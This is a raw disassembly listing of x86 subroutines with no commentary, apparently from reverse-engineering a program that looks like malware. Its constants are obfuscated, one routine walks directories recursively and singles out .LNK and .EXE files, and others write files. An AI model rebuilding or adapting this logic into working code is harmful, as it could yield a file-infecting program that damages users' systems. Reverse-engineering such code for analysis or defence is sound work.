dd 4001B8h, 8C280h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F094 proc near ; CODE XREF: sub_423353+346�p
; sub_423353+440�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov edi, ds:100131CCh
sub edi, 6
cmp edx, edi
jnz short loc_41F0B8
mov eax, [ebp+arg_0]
jmp short loc_41F0D2
; ---------------------------------------------------------------------------
loc_41F0B8: ; CODE XREF: sub_41F094+1D�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_41F0D2: ; CODE XREF: sub_41F094+22�j
pop edi
pop esi
leave
retn
sub_41F094 endp
; =============== S U B R O U T I N E =======================================
sub_41F0D6 proc near ; CODE XREF: sub_42291E+259�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
mov eax, ds:10013154h
movsx edx, word ptr ds:10013098h
add eax, edx
sub eax, 2
cmp ecx, eax
jge short loc_41F12C
mov eax, ds:100130C4h
movsx edx, word ptr ds:100131F0h
add eax, edx
sub eax, 5
imul ecx, eax
mov eax, ds:1001309Ch
sub eax, 4
mov edx, esi
add edx, eax
movsx eax, word ptr ds:1001327Ch
add eax, ds:1001315Ch
sub eax, 9
imul edx, eax
sub ecx, edx
jmp loc_41F269
; ---------------------------------------------------------------------------
loc_41F12C: ; CODE XREF: sub_41F0D6+1A�j
dec ecx
mov eax, ds:1001309Ch
add eax, 0Eh
add eax, ds:100130ACh
cmp ecx, eax
jge short loc_41F16C
movsx eax, word ptr ds:100131E0h
add eax, ds:100130ACh
sub eax, 2
imul ecx, eax
mov eax, ecx
sub eax, esi
mov edx, ds:100131BCh
inc edx
add edx, ds:100131A0h
mov ecx, eax
sub ecx, edx
jmp loc_41F269
; ---------------------------------------------------------------------------
loc_41F16C: ; CODE XREF: sub_41F0D6+67�j
dec ecx
movsx eax, word ptr ds:100130E0h
mov edx, ds:1001314Ch
lea eax, [eax+edx+1Bh]
cmp ecx, eax
jge short loc_41F1A4
movsx eax, word ptr ds:100130A4h
add eax, ds:10013234h
sub eax, 7
imul ecx, eax
mov eax, ds:10013158h
add eax, 39h
sub ecx, eax
jmp loc_41F269
; ---------------------------------------------------------------------------
loc_41F1A4: ; CODE XREF: sub_41F0D6+AA�j
dec ecx
mov eax, ds:10013154h
add eax, 1Dh
cmp ecx, eax
jge short loc_41F1D1
movsx eax, word ptr ds:1001316Ch
inc eax
imul ecx, eax
mov eax, ds:100130C4h
add eax, 39h
add eax, ds:100130D4h
sub ecx, eax
jmp loc_41F269
; ---------------------------------------------------------------------------
loc_41F1D1: ; CODE XREF: sub_41F0D6+D9�j
dec ecx
movsx eax, word ptr ds:100131E0h
mov edx, ds:100130B4h
lea eax, [eax+edx+21h]
cmp ecx, eax
jge short loc_41F20F
movsx eax, word ptr ds:10013264h
add eax, ds:10013114h
sub eax, 0Fh
imul ecx, eax
movsx eax, word ptr ds:10013174h
mov edx, ds:10013138h
lea eax, [eax+edx+4Dh]
sub ecx, eax
jmp short loc_41F269
; ---------------------------------------------------------------------------
loc_41F20F: ; CODE XREF: sub_41F0D6+10F�j
dec ecx
mov eax, ds:100131ECh
add eax, 2Eh
cmp ecx, eax
jge short loc_41F235
mov eax, ds:1001310Ch
sub eax, 4
imul ecx, eax
movsx eax, word ptr ds:100130B0h
add eax, 63h
sub ecx, eax
jmp short loc_41F269
; ---------------------------------------------------------------------------
loc_41F235: ; CODE XREF: sub_41F0D6+144�j
dec ecx
mov eax, ds:10013198h
add eax, 37h
cmp ecx, eax
jge short loc_41F259
mov eax, ds:1001311Ch
sub eax, 3
imul ecx, eax
mov eax, ds:1001317Ch
add eax, 6Bh
sub ecx, eax
jmp short loc_41F269
; ---------------------------------------------------------------------------
loc_41F259: ; CODE XREF: sub_41F0D6+16A�j
mov eax, ds:1001318Ch
add eax, 34h
add eax, ds:10013120h
sub ecx, eax
loc_41F269: ; CODE XREF: sub_41F0D6+51�j
; sub_41F0D6+91�j ...
mov eax, ecx
pop esi
retn
sub_41F0D6 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
movsx eax, word ptr ds:100131C0h
sub eax, 4
cmp ds:1000F608h, eax
jbe short loc_41F28D
push 1000F608h
call dword ptr ds:1000D010h
loc_41F28D: ; CODE XREF: .data:0041F280�j
mov eax, ds:1000F608h
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+8]
mov eax, [ebp+18h]
mov [ebp+18h], ax
movsx eax, word ptr ds:1001322Ch
add eax, 3
cmp ds:1000F620h, eax
jnb short loc_41F2C6
mov eax, ds:10013258h
sub eax, 2
mov ds:1000F620h, eax
loc_41F2C6: ; CODE XREF: .data:0041F2B7�j
mov eax, ds:10013280h
mov edi, eax
add edi, ds:10013210h
sub edi, 5
jmp short loc_41F2E4
; ---------------------------------------------------------------------------
loc_41F2D8: ; CODE XREF: .data:0041F2F0�j
lea ebx, ds:1000E130h[edi*4]
cmp esi, ebx
jz short loc_41F2F2
inc edi
loc_41F2E4: ; CODE XREF: .data:0041F2D6�j
mov eax, ds:100130F4h
add eax, 3E1h
cmp edi, eax
jb short loc_41F2D8
loc_41F2F2: ; CODE XREF: .data:0041F2E1�j
mov eax, ds:10013094h
add eax, 3DCh
movsx edx, word ptr ds:10013230h
add eax, edx
cmp edi, eax
jnz short loc_41F310
xor eax, eax
jmp loc_41F45E
; ---------------------------------------------------------------------------
loc_41F310: ; CODE XREF: .data:0041F307�j
movzx esi, word ptr ds:1000FA50h[edi*2]
mov ebx, ds:100130ACh
movsx edx, word ptr ds:1001327Ch
add ebx, edx
sub ebx, 4
cmp esi, ebx
jnz short loc_41F355
movzx eax, byte ptr ds:1000F200h[edi]
push eax
push dword ptr ds:1000D060h[edi*4]
call sub_42484B
add esp, 8
and dword ptr ds:1000E130h[edi*4], 0
xor eax, eax
jmp loc_41F45E
; ---------------------------------------------------------------------------
loc_41F355: ; CODE XREF: .data:0041F32C�j
movzx esi, word ptr ds:1000FA50h[edi*2]
mov ebx, ds:1001315Ch
add ebx, 0FFF6h
cmp esi, ebx
jnz loc_41F43C
mov eax, ds:10013110h
movsx edx, word ptr ds:100130D8h
add eax, edx
sub eax, 7
mov [ebp-4], eax
jmp loc_41F425
; ---------------------------------------------------------------------------
loc_41F38A: ; CODE XREF: .data:0041F432�j
mov esi, [ebp-4]
mov ebx, esi
shl ebx, 2
cmp dword ptr ds:1000E130h[ebx], 0
jz loc_41F422
movzx edx, word ptr ds:1000FA50h[esi*2]
movsx ecx, word ptr ds:100130C0h
add ecx, 0FFFDh
cmp edx, ecx
jz short loc_41F422
mov edx, ds:1000D060h[edi*4]
cmp ds:1000D060h[ebx], edx
jnz short loc_41F422
mov bl, ds:1000F200h[esi]
cmp bl, ds:1000F200h[edi]
jnz short loc_41F422
movzx esi, word ptr ds:1000FA50h[esi*2]
mov ebx, ds:1001309Ch
sub ebx, 4
cmp esi, ebx
jnz short loc_41F413
mov esi, [ebp-4]
movzx ebx, byte ptr ds:1000F200h[esi]
push ebx
push dword ptr ds:1000D060h[esi*4]
call sub_42484B
add esp, 8
and dword ptr ds:1000E130h[edi*4], 0
jmp short loc_41F438
; ---------------------------------------------------------------------------
loc_41F413: ; CODE XREF: .data:0041F3EC�j
mov esi, [ebp-4]
lea esi, ds:1000FA50h[esi*2]
dec word ptr [esi]
jmp short loc_41F438
; ---------------------------------------------------------------------------
loc_41F422: ; CODE XREF: .data:0041F39A�j
; .data:0041F3B7�j ...
inc dword ptr [ebp-4]
loc_41F425: ; CODE XREF: .data:0041F385�j
mov eax, ds:1001328Ch
add eax, 3E2h
cmp [ebp-4], eax
jb loc_41F38A
loc_41F438: ; CODE XREF: .data:0041F411�j
; .data:0041F420�j
xor eax, eax
jmp short loc_41F45E
; ---------------------------------------------------------------------------
loc_41F43C: ; CODE XREF: .data:0041F36B�j
movzx esi, word ptr ds:1000FA50h[edi*2]
mov ebx, ds:10013274h
add ebx, ds:1001318Ch
cmp esi, ebx
jle short loc_41F45C
dec word ptr ds:1000FA50h[edi*2]
loc_41F45C: ; CODE XREF: .data:0041F452�j
xor eax, eax
loc_41F45E: ; CODE XREF: .data:0041F30B�j
; .data:0041F350�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F465 proc near ; CODE XREF: sub_41D930+B8�p
; sub_41DA2F+1CD�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_425379
push ebx
push esi
push edi
mov edi, ds:10013288h
movsx esi, word ptr ds:10013160h
add edi, esi
imul edi, 3C0h
sub edi, 12C0h
movsx esi, word ptr ds:100131C0h
lea edi, [edi+esi+0EA5Ch]
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_4252FE
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
mov edx, ds:10013200h
add edx, ds:100130A0h
sub edx, 8
cmp eax, edx
jnz short loc_41F4EF
push 10014171h
call sub_41E914
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10012634h
add esp, 8
jmp loc_41F5FD
; ---------------------------------------------------------------------------
loc_41F4EF: ; CODE XREF: sub_41F465+65�j
call dword ptr ds:10010228h
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
mov edx, ds:10013164h
add edx, ds:100130C4h
sub edx, 9
cmp eax, edx
jnz short loc_41F56C
mov eax, ds:100130F0h
add eax, 6
add eax, ds:1001318Ch
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_422EFF
add esp, 0Ch
push 10014141h
call sub_41E914
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10012634h
add esp, 10h
jmp loc_41F5FD
; ---------------------------------------------------------------------------
loc_41F56C: ; CODE XREF: sub_41F465+AD�j
mov eax, ds:10013194h
sub eax, 9
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword ptr ds:10013370h
call sub_422EFF
add esp, 0Ch
push 100140DEh
call sub_41E914
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
movsx ebx, word ptr ds:100131DCh
movsx edx, word ptr ds:10013170h
add ebx, edx
dec ebx
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
movsx esi, word ptr ds:10013104h
sub esi, 4
sub edi, esi
push edi
push 10010230h
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10012634h
add esp, 34h
loc_41F5FD: ; CODE XREF: sub_41F465+85�j
; sub_41F465+102�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
movsx eax, word ptr ds:10013130h
movsx edx, word ptr ds:1001316Ch
add eax, edx
sub eax, 3
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
mov eax, ds:1001321Ch
sub eax, 8
push eax
push 0
call dword ptr ds:10012640h
push 100140C4h
call sub_421B74
add esp, 4
push eax
call dword ptr ds:1000D044h
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call dword ptr ds:1000D044h
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call dword ptr ds:10012BA0h
push [ebp+var_EF30]
call dword ptr ds:10012BA0h
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_41F465 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F699 proc near ; CODE XREF: sub_41CFF0+B6�p
; sub_41CFF0+ED�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
movzx eax, [ebp+arg_0]
mov edx, ds:10013280h
sub edx, 4
cmp eax, edx
jnz short loc_41F6D7
mov eax, 65h
jmp loc_41F760
; ---------------------------------------------------------------------------
loc_41F6D7: ; CODE XREF: sub_41F699+32�j
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:100130CCh
sub edx, 6
cmp eax, edx
jnz short loc_41F6F0
mov eax, 79h
jmp short loc_41F760
; ---------------------------------------------------------------------------
loc_41F6F0: ; CODE XREF: sub_41F699+4E�j
movzx eax, [ebp+arg_0]
mov edx, ds:1001320Ch
add edx, ds:10013120h
sub edx, 9
cmp eax, edx
jnz short loc_41F70E
mov eax, 75h
jmp short loc_41F760
; ---------------------------------------------------------------------------
loc_41F70E: ; CODE XREF: sub_41F699+6C�j
movzx eax, [ebp+arg_0]
mov edx, ds:100131E4h
add edx, ds:10013274h
sub edx, 2
cmp eax, edx
jnz short loc_41F72C
mov eax, 69h
jmp short loc_41F760
; ---------------------------------------------------------------------------
loc_41F72C: ; CODE XREF: sub_41F699+8A�j
movzx eax, [ebp+arg_0]
mov edx, ds:1001328Ch
add edx, ds:1001325Ch
sub edx, 0Ah
cmp eax, edx
jnz short loc_41F74A
mov eax, 6Fh
jmp short loc_41F760
; ---------------------------------------------------------------------------
loc_41F74A: ; CODE XREF: sub_41F699+A8�j
movzx eax, [ebp+arg_0]
mov edx, ds:10013154h
sub edx, 2
cmp eax, edx
jnz short loc_41F760
mov eax, 61h
loc_41F760: ; CODE XREF: sub_41F699+39�j
; sub_41F699+55�j ...
pop edi
pop ebx
leave
retn
sub_41F699 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41F764 proc near ; CODE XREF: .data:0041BA86�p
; sub_41F764+2D8�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_41F792
mov eax, ds:100131E8h
add eax, ds:100130B8h
sub eax, 4
mov [ebp+var_248], eax
jmp loc_41F822
; ---------------------------------------------------------------------------
loc_41F792: ; CODE XREF: sub_41F764+13�j
mov edx, [ebp+arg_4]
mov ecx, ds:100131C4h
add ecx, ds:100131CCh
sub ecx, 0Bh
cmp ds:1000F630h[edx*4], ecx
jnz short loc_41F7C3
push ebx
call dword ptr ds:1000F60Ch
mov eax, ds:100131B8h
sub eax, 4
push eax
call dword ptr ds:10012664h
loc_41F7C3: ; CODE XREF: sub_41F764+47�j
mov eax, ds:10013154h
add eax, 5Dh
add eax, ds:1001318Ch
mov [ebp+var_248], eax
push 100140B9h
call sub_41E914
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call dword ptr ds:10012634h
add esp, 10h
lea eax, [ebp+var_252]
push eax
call dword ptr ds:10012668h
cmp eax, 3
jnz short loc_41F822
movsx eax, word ptr ds:1001322Ch
movsx edx, word ptr ds:10013144h
lea eax, [eax+edx+11Fh]
mov [ebp+var_248], eax
loc_41F822: ; CODE XREF: sub_41F764+29�j
; sub_41F764+A1�j
xor edi, edi
inc edi
push 100140B2h
call sub_41E914
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10012634h
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41F846: ; CODE XREF: sub_41F764+E7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F846
movsx ecx, word ptr ds:100131DCh
add ecx, 4
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_41F8FC
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41F86A: ; CODE XREF: sub_41F764+10B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F86A
mov ecx, ds:10013128h
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 4Ch
jnz short loc_41F8FC
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41F896: ; CODE XREF: sub_41F764+137�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F896
mov edx, eax
mov ecx, ds:10013248h
movsx eax, word ptr ds:100130BCh
add ecx, eax
sub ecx, 6
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 4Eh
jnz short loc_41F8FC
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41F8CB: ; CODE XREF: sub_41F764+16C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F8CB
movsx ecx, word ptr ds:10013150h
sub ecx, 6
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 4Bh
jnz short loc_41F8FC
push esi
call sub_41E19D
add esp, 4
loc_41F8FC: ; CODE XREF: sub_41F764+FB�j
; sub_41F764+12B�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41F901: ; CODE XREF: sub_41F764+1A2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F901
movsx ecx, word ptr ds:100130BCh
add ecx, ds:100131F4h
sub ecx, 8
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_41F9CF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41F92B: ; CODE XREF: sub_41F764+1CC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F92B
movsx ecx, word ptr ds:100130CCh
add ecx, ds:100131B0h
sub ecx, 0Ah
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 45h
jnz short loc_41F9CF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41F95E: ; CODE XREF: sub_41F764+1FF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F95E
mov ecx, ds:10013278h
add ecx, ds:1001320Ch
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 58h
jnz short loc_41F9CF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41F990: ; CODE XREF: sub_41F764+231�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41F990
mov edx, eax
mov ecx, ds:10013134h
movsx eax, word ptr ds:10013250h
add ecx, eax
sub ecx, 7
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 45h
jnz short loc_41F9CF
push [ebp+var_248]
push esi
call sub_4226A9
add esp, 8
loc_41F9CF: ; CODE XREF: sub_41F764+1BC�j
; sub_41F764+1F3�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10010258h
mov ebx, eax
movsx eax, word ptr ds:1001322Ch
movsx edx, word ptr ds:10013104h
add eax, edx
sub eax, 0Eh
neg eax
cmp ebx, eax
jz loc_41FAB9
cmp [ebp+var_112], 2Eh
jz loc_41FAB5
push 100140A9h
call sub_41E914
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10012634h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_41F764
add esp, 20h
jmp short loc_41FAB5
; ---------------------------------------------------------------------------
loc_41FA46: ; CODE XREF: sub_41F764+353�j
lea eax, [ebp+var_13E]
push eax
push ebx
call dword ptr ds:1000E004h
mov edi, eax
or edi, edi
jnz short loc_41FA77
mov eax, [ebp+var_248]
add eax, ds:10012638h
push eax
call dword ptr ds:10012630h
pop ecx
push ebx
call dword ptr ds:1000F60Ch
jmp short loc_41FAB9
; ---------------------------------------------------------------------------
loc_41FA77: ; CODE XREF: sub_41F764+2F4�j
cmp [ebp+var_112], 2Eh
jz short loc_41FAB5
push 100140A0h
call sub_41E914
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10012634h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_41F764
add esp, 20h
loc_41FAB5: ; CODE XREF: sub_41F764+2A5�j
; sub_41F764+2E0�j ...
or edi, edi
jnz short loc_41FA46
loc_41FAB9: ; CODE XREF: sub_41F764+298�j
; sub_41F764+311�j
pop edi
pop esi
pop ebx
leave
retn
sub_41F764 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FABE proc near ; CODE XREF: .data:0042130A�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, ds:1001323Ch
sub eax, 5
mov [ebp+var_4], eax
jmp short loc_41FAEA
; ---------------------------------------------------------------------------
loc_41FAD4: ; CODE XREF: sub_41FABE+40�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and dword ptr ds:10010370h[eax], 0
inc [ebp+var_4]
loc_41FAEA: ; CODE XREF: sub_41FABE+14�j
movsx eax, word ptr ds:10013264h
mov edx, ds:100130A0h
lea eax, [eax+edx+57h]
cmp [ebp+var_4], eax
jb short loc_41FAD4
push 0
call dword ptr ds:1000F0D0h
push 10013394h
push 10014AB8h
push 7
push 0
push 100149F8h
call dword ptr ds:1000F624h
mov ebx, eax
mov eax, ds:1001311Ch
sub eax, 5
cmp ebx, eax
jnz loc_41FCE6
lea eax, [ebp+var_C]
push eax
mov eax, ds:10013394h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
mov eax, ds:10013190h
sub eax, 2
cmp ebx, eax
jnz short loc_41FB66
mov eax, ds:1001310Ch
movsx edx, word ptr ds:10013208h
add eax, edx
sub eax, 0Bh
cmp [ebp+var_C], eax
jnz short loc_41FB6B
loc_41FB66: ; CODE XREF: sub_41FABE+90�j
jmp loc_41FC76
; ---------------------------------------------------------------------------
loc_41FB6B: ; CODE XREF: sub_41FABE+A6�j
mov eax, ds:100131D4h
movsx edx, word ptr ds:10013130h
add eax, edx
sub eax, 5
mov [ebp+var_8], eax
jmp loc_41FC6A
; ---------------------------------------------------------------------------
loc_41FB84: ; CODE XREF: sub_41FABE+1B2�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:10013394h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word ptr ds:10013144h
add eax, ds:100130A0h
sub eax, 0Ah
cmp ebx, eax
jnz loc_41FC67
lea eax, [ebp+var_40]
push eax
push 10014AD8h
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100131D0h
movsx edx, word ptr ds:10013264h
add eax, edx
sub eax, 10h
cmp ebx, eax
jnz short loc_41FC5E
lea eax, ds:10013390h
mov [ebp+var_24], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_44]
push eax
push 10014A18h
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10013110h
sub eax, 5
cmp ebx, eax
jnz short loc_41FC4C
lea eax, [ebp+var_48]
push eax
push 10014A18h
push [ebp+var_44]
push [ebp+var_40]
call sub_421A4A
add esp, 10h
mov [ebp+var_4C], eax
mov eax, [ebp+var_44]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41FC4C: ; CODE XREF: sub_41FABE+169�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_40]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41FC5E: ; CODE XREF: sub_41FABE+136�j
mov eax, [ebp+var_3C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41FC67: ; CODE XREF: sub_41FABE+105�j
inc [ebp+var_8]
loc_41FC6A: ; CODE XREF: sub_41FABE+C1�j
mov eax, [ebp+var_C]
cmp [ebp+var_8], eax
jb loc_41FB84
loc_41FC76: ; CODE XREF: sub_41FABE:loc_41FB66�j
lea eax, ds:100133B4h
mov [ebp+var_10], eax
push eax
mov esi, [eax]
call dword ptr [esi+4]
lea eax, [ebp+var_14]
push eax
push 10014A08h
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr ds:0[esi]
mov eax, [ebp+var_10]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea eax, [ebp+var_1C]
push eax
push 10014A08h
push [ebp+var_14]
push dword ptr ds:10013394h
call sub_421A4A
add esp, 10h
mov [ebp+var_18], eax
mov ecx, ds:100131CCh
add ecx, ds:100130ECh
sub ecx, 0Ah
cmp eax, ecx
jnz short loc_41FCE6
mov eax, ds:10013394h
push eax
mov esi, [eax]
call dword ptr [esi+8]
and dword ptr ds:10013394h, 0
loc_41FCE6: ; CODE XREF: sub_41FABE+6F�j
; sub_41FABE+214�j
pop edi
pop esi
pop ebx
leave
retn
sub_41FABE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FCEB proc near ; CODE XREF: sub_41D354+327�p
; sub_41D354+3B2�p
var_16C = byte ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 16Ch
push ebx
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000F600h
lea eax, [ebp+var_168]
push eax
call sub_421C67
push 1001409Bh
call sub_41E914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000D020h
push 10014093h
call sub_41E914
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000D020h
add esp, 24h
push 0
push 80h
push 4
push 0
movsx eax, word ptr ds:100130D0h
sub eax, 7
push eax
push 40000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10012788h
mov edi, eax
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10012B9Ch
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41FD9C: ; CODE XREF: sub_41FCEB+B6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41FD9C
mov esi, eax
push 0
lea ebx, [ebp+var_16C]
push ebx
push esi
push [ebp+arg_0]
push edi
call dword ptr ds:10012B8Ch
push edi
call dword ptr ds:10011654h
pop edi
pop esi
pop ebx
leave
retn
sub_41FCEB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp-210h]
push eax
push 1000F0F0h
call sub_42288C
add esp, 8
mov [ebp-208h], eax
test eax, eax
jnz short loc_41FDF6
xor eax, eax
jmp loc_41FF93
; ---------------------------------------------------------------------------
loc_41FDF6: ; CODE XREF: .data:0041FDED�j
mov eax, ds:100130ECh
add eax, ds:100130DCh
sub eax, 3
mov [ebp-204h], eax
loc_41FE0A: ; CODE XREF: .data:0041FF7F�j
mov eax, [ebp-204h]
mov edx, [ebp-208h]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_41FE1C: ; CODE XREF: .data:0041FE21�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41FE1C
mov [ebp-20Ch], eax
cmp dword ptr [ebp-20Ch], 0FFh
jnb short loc_41FE60
mov eax, [ebp-204h]
movsx edx, word ptr ds:10013230h
add edx, ds:100131E8h
sub edx, 6
add eax, edx
add eax, [ebp-208h]
push eax
lea eax, [ebp-0FFh]
push eax
